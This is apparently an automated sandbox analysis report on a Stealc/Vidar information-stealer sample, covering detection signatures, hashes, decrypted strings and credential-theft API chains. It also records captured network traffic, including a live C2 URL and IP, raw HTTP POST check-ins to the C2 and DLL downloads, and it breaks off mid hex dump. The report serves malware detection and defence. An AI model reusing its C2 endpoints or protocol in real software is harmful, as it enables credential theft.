Windows Analysis Report
FFAk2gixx5.exe

Overview

General Information

Sample name: FFAk2gixx5.exe
renamed because original name is a hash value
Original sample name: 14cd6d9cbad80b0e4076212bf7ad937f.exe
Analysis ID: 1436574
MD5: 14cd6d9cbad80b0e4076212bf7ad937f
SHA1: 6f553fad2fd973d52dec55582490eb8c3a35b6e1
SHA256: 1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
Tags: exe, Stealc

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: http://okkolus.com/cf5cbdf706840b3f.php Avira URL Cloud: Label: malware
Source: http://okkolus.com/cf5cbdf706840b3f.php/M Avira URL Cloud: Label: malware
Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}
Source: okkolus.com Virustotal: Detection: 10%
Source: http://okkolus.com Virustotal: Detection: 10%
Source: http://okkolus.com/cf5cbdf706840b3f.php Virustotal: Detection: 13%
Source: http://okkolus.com/dfaf16606234b71d/nss3.dlle Virustotal: Detection: 5%
Source: FFAk2gixx5.exe ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe Virustotal: Detection: 68%
Source: FFAk2gixx5.exe Joe Sandbox ML: detected
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: CtIvEWInDoW
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: AgEBOxw
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: OsUse
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: }@@@e$@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: L 45`vy`ty`tx`sp@@@@<@@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: >22lmnopq((\]^_`abcdefghijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: %s\%_
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: %s\%]
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: [EGEKM^Ywxyztasc}567y9n/S
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: jAss}ord
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: '!#!/!#{|}
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: `o^UFF
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: {K}ri*#
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: advapi32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: HeapFree
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: ntProcessId
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: wininet.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: shell32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: .dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: khrc7C9Pm
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: column_text
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack String decryptor: login:
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00409540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00406C10
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_004094A0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00415590 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00415590
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat, 0_2_0040BF90
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_02FC6E77
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD57F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_02FD57F7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC97A7 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_02FC97A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_02FC9707
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat, 0_2_02FCC1F7

Compliance

Source: C:\Users\user\Desktop\FFAk2gixx5.exe Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack
Source: FFAk2gixx5.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_02FD27D7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_02FCD7A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_02FD18B7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_02FCB877
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_02FD2457
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_02FC1827
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_02FCD427
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_02FD1DE7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_02FCDDC7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49706 -> 31.41.44.147:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49707 -> 31.41.44.147:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 31.41.44.147:80 -> 192.168.2.6:49707
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49708 -> 31.41.44.147:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 31.41.44.147:80 -> 192.168.2.6:49708
Source: Malware configuration extractor URLs: http://okkolus.com/cf5cbdf706840b3f.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 18:30:30 GMTETag: "10e436-5e7f2463c1d80"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "a7550-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 685392Connection: closeContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "94750-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 608080Connection: closeContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "6dde8-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 450024Connection: closeContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "1f3950-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 2046288Connection: closeContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "3ef50-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 257872Connection: closeContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "13bf0-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 80880Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: okkolus.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"browsers------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: okkolus.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"plugins------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: okkolus.comContent-Length: 6247Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: okkolus.comContent-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 